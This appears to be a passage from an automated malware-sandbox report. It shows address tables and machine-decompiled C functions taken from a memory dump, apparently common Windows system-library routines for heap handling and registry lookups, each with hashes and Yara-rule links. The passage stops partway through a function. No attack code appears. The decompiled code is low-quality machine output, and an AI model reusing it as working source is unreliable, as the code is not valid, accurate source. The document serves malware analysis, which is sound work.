                                                      0x017a2da8
                                                      0x017a2dab
                                                      0x017a2db2
                                                      0x017ff9aa
                                                      0x017ff9ab
                                                      0x017ff9ae
                                                      0x017ff9ae
                                                      0x017a2db8
                                                      0x017a2dc2
                                                      0x017ff9b9
                                                      0x017ff9be
                                                      0x017ff9bf
                                                      0x017ff9bf
                                                      0x017a2dcf
                                                      0x017ff9c9
                                                      0x017a2dd5
                                                      0x017a2dd5
                                                      0x017a2dd5
                                                      0x017a2dde
                                                      0x017a2de1
                                                      0x017a2e70
                                                      0x017a2e72
                                                      0x017a2e72
                                                      0x017a2de7
                                                      0x017a2deb
                                                      0x017a2e7c
                                                      0x017a2e83
                                                      0x017a2e85
                                                      0x017a2e8b
                                                      0x017a2e8d
                                                      0x017a2e92
                                                      0x017a2e92
                                                      0x017a2e85
                                                      0x017a2df1
                                                      0x017a2df7
                                                      0x017a2df9
                                                      0x017a2df9
                                                      0x017a2dfc
                                                      0x017a2dff
                                                      0x017a2e02
                                                      0x00000000
                                                      0x017a2e05
                                                      0x017a2e0c
                                                      0x017ff9d9
                                                      0x017a2e12
                                                      0x017a2e12
                                                      0x017a2e12
                                                      0x017a2e1a
                                                      0x017ff9e3
                                                      0x017ff9e9
                                                      0x017ff9f0
                                                      0x017ff9f6
                                                      0x017ff9f8
                                                      0x017ff9f8
                                                      0x017ff9f0
                                                      0x017a2e23
                                                      0x017ffa02
                                                      0x017ffa03
                                                      0x017ffa05
                                                      0x017ffa06
                                                      0x00000000
                                                      0x017a2e29
                                                      0x017a2e29
                                                      0x017a2e2e
                                                      0x017a2e34
                                                      0x017a2e3e
                                                      0x00000000
                                                      0x00000000
                                                      0x017a2e44
                                                      0x017a2e47
                                                      0x017a2e4d
                                                      0x00000000
                                                      0x00000000
                                                      0x017a2e4f
                                                      0x017a2e54
                                                      0x00000000
                                                      0x00000000
                                                      0x017a2e5a
                                                      0x017a2e5f
                                                      0x017a2e9a
                                                      0x017a2ea4
                                                      0x017a2ea5
                                                      0x017a2ea8
                                                      0x017a2eaf
                                                      0x017a2eb2
                                                      0x017a2eb5
                                                      0x017ffae9
                                                      0x017ffaeb
                                                      0x017ffaed
                                                      0x017ffaef
                                                      0x017ffaf7
                                                      0x017ffaf8
                                                      0x017ffafd
                                                      0x017ffaff
                                                      0x017ffb04
                                                      0x017ffb04
                                                      0x017ffaff
                                                      0x017a2ec0
                                                      0x017a2ec4
                                                      0x017a2ec6
                                                      0x017a2ec8
                                                      0x017ffb14
                                                      0x017ffb18
                                                      0x017ffb1e
                                                      0x017ffb21
                                                      0x017ffb21
                                                      0x017a2ece
                                                      0x017a2ece
                                                      0x017a2ece
                                                      0x017a2ed7
                                                      0x017a2e61
                                                      0x017a2e63
                                                      0x017ffa6b
                                                      0x017ffa71
                                                      0x017ffa76
                                                      0x017ffa78
                                                      0x017ffa8a
                                                      0x017ffa7a
                                                      0x017ffa83
                                                      0x017ffa83
                                                      0x017ffa8f
                                                      0x017ffa91
                                                      0x017ffa97
                                                      0x017ffa9d
                                                      0x017ffaa4
                                                      0x017ffaaa
                                                      0x017ffaaf
                                                      0x017ffab1
                                                      0x017ffac3
                                                      0x017ffab3
                                                      0x017ffabc
                                                      0x017ffabc
                                                      0x017ffac8
                                                      0x017ffacb
                                                      0x017ffadf
                                                      0x017ffadf
                                                      0x017ffacb
                                                      0x017ffaa4
                                                      0x017ffa91
                                                      0x017a2e6f
                                                      0x017a2e6f
                                                      0x017a2e5f
                                                      0x017ffa13
                                                      0x017ffa15
                                                      0x017ffa17
                                                      0x017ffa1f
                                                      0x017ffa21
                                                      0x017ffa22
                                                      0x017ffa25
                                                      0x017ffa28
                                                      0x017ffa2f
                                                      0x017ffa2f
                                                      0x017ffa2a
                                                      0x017ffa2a
                                                      0x017ffa2a
                                                      0x017ffa31
                                                      0x017ffa34
                                                      0x017ffa36
                                                      0x017ffa3c
                                                      0x017ffa3e
                                                      0x017ffa41
                                                      0x017ffa43
                                                      0x017ffa45
                                                      0x017ffa45
                                                      0x017ffa41
                                                      0x017ffa3c
                                                      0x017ffa4a
                                                      0x017ffa4f
                                                      0x017ffa51
                                                      0x017ffa53
                                                      0x017ffa56
                                                      0x017ffa5b
                                                      0x017ffa5e
                                                      0x00000000
                                                      0x017ffa5e
                                                      0x017a2e23

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Re-Waiting
                                                      • API String ID: 0-316354757
                                                      • Opcode ID: f9ede2c91bdead99be04f7b7e06979daba26572f63189a0392ea4503ee66c02a
                                                      • Instruction ID: 3af340d522a7e3ea23999dedcdd3ef0ea535011ae7c9c09c8d2351dfc3d8a7da
                                                      • Opcode Fuzzy Hash: f9ede2c91bdead99be04f7b7e06979daba26572f63189a0392ea4503ee66c02a
                                                      • Instruction Fuzzy Hash: 72612832A046059BDB32DF6CC848B7EF7A0EB85714F58029DD711973C2CB349E848792
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01870EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 80%
                                                      			E01870EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0186FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E01871074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E017E9730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0186A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0186A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x1898b04 >> 0x14) + (_v44 -  *0x1898b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E017C7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0186138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E017C7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0185FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x1898724 & 0x00000008) != 0) {
						E018652F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E018715B5(0x1898ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                                      0x01870eb7
                                                      0x01870eb9
                                                      0x01870ec0
                                                      0x01870ec2
                                                      0x01870ecd
                                                      0x0187105b
                                                      0x0187105b
                                                      0x01871061
                                                      0x01871066
                                                      0x01871066
                                                      0x0187106b
                                                      0x01871073
                                                      0x01871073
                                                      0x01870ed3
                                                      0x01870ed6
                                                      0x01870edc
                                                      0x01870ee0
                                                      0x01870ee7
                                                      0x01870ef0
                                                      0x01870ef5
                                                      0x01870efa
                                                      0x01870efc
                                                      0x01870efd
                                                      0x01870f03
                                                      0x01870f04
                                                      0x01870f06
                                                      0x01870f07
                                                      0x01870f09
                                                      0x01870f0e
                                                      0x01870f14
                                                      0x01870f23
                                                      0x01870f2d
                                                      0x01870f34
                                                      0x01870f34
                                                      0x01870f14
                                                      0x01870f52
                                                      0x00000000
                                                      0x00000000
                                                      0x01870f58
                                                      0x01870f73
                                                      0x01870f74
                                                      0x01870f79
                                                      0x01870f7d
                                                      0x01870f80
                                                      0x01870f86
                                                      0x01870fab
                                                      0x01870fb5
                                                      0x01870fc6
                                                      0x01870fd1
                                                      0x01870fe3
                                                      0x01870fd3
                                                      0x01870fdc
                                                      0x01870fdc
                                                      0x01870feb
                                                      0x01871009
                                                      0x01871009
                                                      0x01871015
                                                      0x01871027
                                                      0x01871017
                                                      0x01871020
                                                      0x01871020
                                                      0x0187102f
                                                      0x0187103c
                                                      0x0187103c
                                                      0x01871048
                                                      0x01871050
                                                      0x01871050
                                                      0x01871055
                                                      0x00000000
                                                      0x01871055
                                                      0x01870f88
                                                      0x01870f9e
                                                      0x01870fa2
                                                      0x01870fa9
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x01870fa9
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: `
                                                      • API String ID: 0-2679148245
                                                      • Opcode ID: e991012b42dfee926f03c1edb1cf907c61c95c5685d86ddd7da107e928d6c65b
                                                      • Instruction ID: 5985b3f61cda4dffb816ec51dbd69074874953d95e56f80dd704a32f8d83fc7b
                                                      • Opcode Fuzzy Hash: e991012b42dfee926f03c1edb1cf907c61c95c5685d86ddd7da107e928d6c65b
                                                      • Instruction Fuzzy Hash: B7518C713043429FE325DF28D888B1BBBE9EBC5704F04092CFA96D7691D671EA45CB62
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017DF0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 75%
                                                      			E017DF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E017C4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E017E9830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E017E9990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E017E95D0();
							goto L11;
						} else {
							_t109 = L017C4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E017EF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E017E95D0();
										L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                      0x017df0d3
                                                      0x017df0d9
                                                      0x017df0e0
                                                      0x017df0e7
                                                      0x017df0f2
                                                      0x017df0f4
                                                      0x017df0f8
                                                      0x017df100
                                                      0x017df108
                                                      0x017df10d
                                                      0x017df115
                                                      0x017df116
                                                      0x017df11f
                                                      0x017df123
                                                      0x017df124
                                                      0x017df12c
                                                      0x017df130
                                                      0x017df134
                                                      0x017df13d
                                                      0x017df144
                                                      0x017df14b
                                                      0x017df152
                                                      0x0181bab0
                                                      0x0181bab0
                                                      0x017df158
                                                      0x017df158
                                                      0x017df15a
                                                      0x017df160
                                                      0x017df165
                                                      0x017df166
                                                      0x017df16f
                                                      0x017df173
                                                      0x0181baa7
                                                      0x0181baa7
                                                      0x0181baab
                                                      0x00000000
                                                      0x017df179
                                                      0x017df18d
                                                      0x017df191
                                                      0x0181baa2
                                                      0x00000000
                                                      0x017df197
                                                      0x017df19b
                                                      0x017df1a2
                                                      0x017df1a9
                                                      0x017df1af
                                                      0x017df1b2
                                                      0x017df1b6
                                                      0x017df1b9
                                                      0x017df1c4
                                                      0x017df1d8
                                                      0x017df1df
                                                      0x017df1e3
                                                      0x017df1eb
                                                      0x017df1ee
                                                      0x017df1f4
                                                      0x017df20f
                                                      0x0181bab7
                                                      0x0181babb
                                                      0x0181bacc
                                                      0x0181bad1
                                                      0x017df215
                                                      0x017df218
                                                      0x017df226
                                                      0x017df22b
                                                      0x00000000
                                                      0x017df22b
                                                      0x017df1f6
                                                      0x017df1f6
                                                      0x017df1f9
                                                      0x017df1fb
                                                      0x017df1fb
                                                      0x017df1f4
                                                      0x017df191
                                                      0x017df173
                                                      0x017df152
                                                      0x017df203

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @
                                                      • API String ID: 0-2766056989
                                                      • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                      • Instruction ID: f3b6b212d9d1973919cb08100380ccadc0a47dc0270ed9ae35e08c132ed55ea8
                                                      • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                      • Instruction Fuzzy Hash: 93516A725047159BC320DF29C844A6BFBF8FF88710F00892DFA9697690E7B4E904CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01823540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 75%
                                                      			E01823540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x189d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E017E0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E01823706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E017EFA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E01823540;
						E017EFA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E017FDDD0( &_v1072, _t75, _t79, _t80, _t81);
						E01830C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E017E97C0();
					}
					return E017EB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E01823971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E01823884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E017EFA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E017E9650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E01823787(_a4,  &_v352, _t80);
						}
					}
					L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E017E95D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                                      0x01823552
                                                      0x0182355a
                                                      0x0182355d
                                                      0x01823566
                                                      0x01823567
                                                      0x0182357e
                                                      0x0182358f
                                                      0x018235a1
                                                      0x018235a5
                                                      0x0182366b
                                                      0x0182366b
                                                      0x0182366d
                                                      0x01823672
                                                      0x01823679
                                                      0x01823685
                                                      0x0182368d
                                                      0x0182369d
                                                      0x018236a7
                                                      0x018236b8
                                                      0x018236c6
                                                      0x018236c7
                                                      0x018236dc
                                                      0x018236e1
                                                      0x018236e7
                                                      0x018236e9
                                                      0x018236e9
                                                      0x01823703
                                                      0x01823703
                                                      0x018235b5
                                                      0x018235c0
                                                      0x018235c4
                                                      0x00000000
                                                      0x00000000
                                                      0x018235ca
                                                      0x018235d7
                                                      0x018235e2
                                                      0x018235e6
                                                      0x018235e8
                                                      0x018235f5
                                                      0x018235fa
                                                      0x01823603
                                                      0x01823604
                                                      0x01823609
                                                      0x0182360a
                                                      0x01823612
                                                      0x01823613
                                                      0x0182361e
                                                      0x01823622
                                                      0x01823628
                                                      0x0182362f
                                                      0x0182362f
                                                      0x01823636
                                                      0x01823638
                                                      0x0182363b
                                                      0x01823642
                                                      0x01823642
                                                      0x01823636
                                                      0x01823657
                                                      0x01823657
                                                      0x0182365c
                                                      0x01823662
                                                      0x01823669
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: BinaryHash
                                                      • API String ID: 0-2202222882
                                                      • Opcode ID: c3da96c8cbe018e70c71837f9f771a5419d2dcca7b31338ae2f469b86fdc1288
                                                      • Instruction ID: 6e81199075f850ea0a6526243506dd06aae851c6b65760cf5b778ba678792c9d
                                                      • Opcode Fuzzy Hash: c3da96c8cbe018e70c71837f9f771a5419d2dcca7b31338ae2f469b86fdc1288
                                                      • Instruction Fuzzy Hash: DD4143F2D0052DABDF219A54CC94F9EB7BCAB48714F0045A5EB09AB241DB349F888F95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 018705AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 71%
                                                      			E018705AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E018707DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E017E9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E0186A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E0186A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E01871293(_t79, _v40, E018707DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E017C7D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E0186138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                                      0x018705c5
                                                      0x018705ca
                                                      0x018705d3
                                                      0x018706db
                                                      0x018706db
                                                      0x018706dd
                                                      0x018706e3
                                                      0x018706e3
                                                      0x018705dd
                                                      0x018705e7
                                                      0x018705f6
                                                      0x01870600
                                                      0x01870607
                                                      0x01870610
                                                      0x01870615
                                                      0x0187061a
                                                      0x0187061c
                                                      0x0187061e
                                                      0x01870624
                                                      0x01870625
                                                      0x01870627
                                                      0x01870628
                                                      0x01870631
                                                      0x01870640
                                                      0x0187064d
                                                      0x01870654
                                                      0x01870654
                                                      0x01870631
                                                      0x0187066d
                                                      0x01870674
                                                      0x00000000
                                                      0x00000000
                                                      0x01870692
                                                      0x0187069e
                                                      0x018706b0
                                                      0x018706a0
                                                      0x018706a9
                                                      0x018706a9
                                                      0x018706b8
                                                      0x018706d6
                                                      0x018706d6
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: `
                                                      • API String ID: 0-2679148245
                                                      • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                      • Instruction ID: 941d4f242ee1399ef3401c2b0eaf3c48a1d8dcafa5acbacea55ff4d3b9249923
                                                      • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                      • Instruction Fuzzy Hash: 2431E47260434A6BE710DE28CD85F97BBD9EBC5754F144229FA54EB280D770EA04CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01823884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 72%
                                                      			E01823884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E017E9650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L017C4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E017E9650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                                      0x01823893
                                                      0x01823896
                                                      0x01823899
                                                      0x0182389f
                                                      0x018238a0
                                                      0x018238a4
                                                      0x018238a9
                                                      0x018238ac
                                                      0x018238ad
                                                      0x018238ae
                                                      0x018238af
                                                      0x018238b1
                                                      0x018238b4
                                                      0x018238bb
                                                      0x018238bc
                                                      0x018238bd
                                                      0x018238c4
                                                      0x018238c8
                                                      0x018238ca
                                                      0x018238ca
                                                      0x018238d5
                                                      0x0182393e
                                                      0x01823940
                                                      0x01823942
                                                      0x01823952
                                                      0x01823954
                                                      0x01823961
                                                      0x01823961
                                                      0x01823967
                                                      0x0182396e
                                                      0x0182396e
                                                      0x01823947
                                                      0x0182394c
                                                      0x00000000
                                                      0x0182394c
                                                      0x018238ea
                                                      0x018238ee
                                                      0x018238f8
                                                      0x018238f9
                                                      0x018238ff
                                                      0x01823900
                                                      0x01823902
                                                      0x01823903
                                                      0x0182390b
                                                      0x0182390f
                                                      0x01823950
                                                      0x00000000
                                                      0x01823950
                                                      0x01823915
                                                      0x0182391d
                                                      0x0182391d
                                                      0x01823922
                                                      0x01823926
                                                      0x00000000
                                                      0x01823928
                                                      0x0182392b
                                                      0x0182392b
                                                      0x01823935
                                                      0x01823937
                                                      0x01823937
                                                      0x00000000
                                                      0x01823935
                                                      0x01823926
                                                      0x018238f0
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: BinaryName
                                                      • API String ID: 0-215506332
                                                      • Opcode ID: 4d96ae4c3f6554297da9ea31e5a8273b1629eafa91d33c0936581bb79cb07b4f
                                                      • Instruction ID: b451cf941f63bd8dad3c1e4a7a05a8f0148d930d5bd2b4dc68d66adfdfd9c67f
                                                      • Opcode Fuzzy Hash: 4d96ae4c3f6554297da9ea31e5a8273b1629eafa91d33c0936581bb79cb07b4f
                                                      • Instruction Fuzzy Hash: 9D310872A0052ABFDB16DA58C955D7BF7B4FB4AB20F014129ED04E7241D7349F40CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017DD294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 33%
                                                      			E017DD294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
